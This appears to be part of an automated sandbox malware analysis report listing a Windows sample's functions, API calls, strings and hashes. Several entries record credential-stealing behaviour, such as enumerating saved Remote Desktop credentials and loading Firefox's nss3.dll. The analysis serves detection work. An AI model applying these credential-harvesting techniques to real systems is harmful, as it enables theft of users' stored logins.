                  • Instruction Fuzzy Hash: 87F02670A04005B4EB306B32DD42FAF39655B41784F24023BB518B12E2EABC8F81966C
                  Function 0040C169 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C189
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C1AB
                  • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C1BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide$OpenStorage
                  • String ID: Settings
                  • API String ID: 2489594185-473154195
                  • Opcode ID: 1d740487de696f18979e862d4e48132253c9fc08e755ef657b946a443940230f
                  • Instruction ID: 941221d1b5e35f73e9534d79b450400ad248555062b28b39a48171f98e156158
                  • Opcode Fuzzy Hash: 1d740487de696f18979e862d4e48132253c9fc08e755ef657b946a443940230f
                  • Instruction Fuzzy Hash: D031D830A4010AFBDF11AFE1CC42F9EBB76BF04748F20826AB611791F1D6759A50AB58
                  Function 0040814A Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: http://$https://
                  • API String ID: 0-1916535328
                  • Opcode ID: 3298a56c5f09f09c3e3e7a8400f1c6da017d87b2c36f94c5f2899de2f956eb9a
                  • Instruction ID: d051175a62bb88a713ec024e39b4392a46a63193600da9ef2a244b006afa0ba2
                  • Opcode Fuzzy Hash: 3298a56c5f09f09c3e3e7a8400f1c6da017d87b2c36f94c5f2899de2f956eb9a
                  • Instruction Fuzzy Hash: 44410631800108FBDF12AF91DE05BEE7B72AF40308F10807AB541791F1CBBA4AA1EB59
                  Function 004018C1 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                  Download Yara Rule
                  APIs
                  • GetTickCount.KERNEL32 ref: 004018CB
                  • GetHGlobalFromStream.OLE32(?,?), ref: 004018E4
                  • GlobalLock.KERNEL32(?), ref: 004018FF
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • GlobalUnlock.KERNEL32(?), ref: 00401927
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
                  • String ID:
                  • API String ID: 1884134869-0
                  • Opcode ID: 9e8c7c343a3ba8b6e42bcdbf617ef25788879b68666c322fd17dd1257e8940a7
                  • Instruction ID: fa894349ec8e41eab0d0ba830e0c054b9ff2bf07efe50faea15570e3bc294318
                  • Opcode Fuzzy Hash: 9e8c7c343a3ba8b6e42bcdbf617ef25788879b68666c322fd17dd1257e8940a7
                  • Instruction Fuzzy Hash: D621B87590010DBEDF11AFA1CC429DDBF7AEF04348F0040BABA14B51B2DB799B95AB48
                  Function 0040C80B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00401548: lstrlen.KERNEL32(00000000), ref: 00401554
                  • StrStrIA.SHLWAPI(?,004136AB), ref: 0040C84A
                  • lstrlen.KERNEL32(TERMSRV/,?,004136AB), ref: 0040C858
                  • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,004136AB), ref: 0040C868
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen
                  • String ID: TERMSRV/
                  • API String ID: 1659193697-3001602198
                  • Opcode ID: f3a8ee6282a4e3f6db9a69a6f5144106a8f0e68b97a36eedc9dc6c6e154e4739
                  • Instruction ID: 06c8ac44936cd5b1fa0ae46afa5e3ea2e95f82a9d9bbb4ca97b0d568c086e9fd
                  • Opcode Fuzzy Hash: f3a8ee6282a4e3f6db9a69a6f5144106a8f0e68b97a36eedc9dc6c6e154e4739
                  • Instruction Fuzzy Hash: EB11A831450109BBCF126FA1CC42CDE3E62AF55359F108536B915752F1D77A8AB1AB88
                  Function 00408C43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00408C56
                  • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408C77
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CurrentDirectorylstrlen
                  • String ID: nss3.dll
                  • API String ID: 2713697268-2492180550
                  • Opcode ID: 8815094c7fd1fd20449cb55087e789c3a84d2a4623d1d5bb4d157efc85b5181e
                  • Instruction ID: f1d91d0dd5899a745220176361581cd3732e4b9ece975038861849ba2aa67b00
                  • Opcode Fuzzy Hash: 8815094c7fd1fd20449cb55087e789c3a84d2a4623d1d5bb4d157efc85b5181e
                  • Instruction Fuzzy Hash: 311182305052419BEB256F20EF0978A3F71BB05348F10813EF406E52F6DFF94865961E
                  Function 0040C8BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040C8FB
                  • CredFree.ADVAPI32(00000000), ref: 0040C942
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Cred$EnumerateFree
                  • String ID: TERMSRV/*
                  • API String ID: 3403564193-275249402
                  • Opcode ID: b28022198875cfa781cfb2bc2165eea29b141934139aa9cb061d4893e741070c
                  • Instruction ID: 294abffb2cfa459f6608875a23fed19a1efe6438d229e5c72e41a04cdb8eb016
                  • Opcode Fuzzy Hash: b28022198875cfa781cfb2bc2165eea29b141934139aa9cb061d4893e741070c
                  • Instruction Fuzzy Hash: 23115E71800204EBDF218F88C848BDEBBB5AF00315F148276D541B12F0D3795A84DB8D
                  Function 00401C21 Relevance: 5.0, APIs: 4, Instructions: 33stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?), ref: 00401C42
                  • lstrlen.KERNEL32(00000000,?), ref: 00401C4C
                  • lstrcpy.KERNEL32(00000000,?), ref: 00401C60
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401C69
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID:
                  • API String ID: 2414487701-0
                  • Opcode ID: 9b24d35cd82ca6673d6072b248acc88e076e622046546d064a1723d21eeab292
                  • Instruction ID: 7dc0d747844ad8693d5b3fcbf74b2ff173d7593578b7ac928320faef0b1e46f6
                  • Opcode Fuzzy Hash: 9b24d35cd82ca6673d6072b248acc88e076e622046546d064a1723d21eeab292
                  • Instruction Fuzzy Hash: 84F0177114420CBADF217F62CC85A9D3A69AB11359F10C03BB919291B2D7BDC988DB68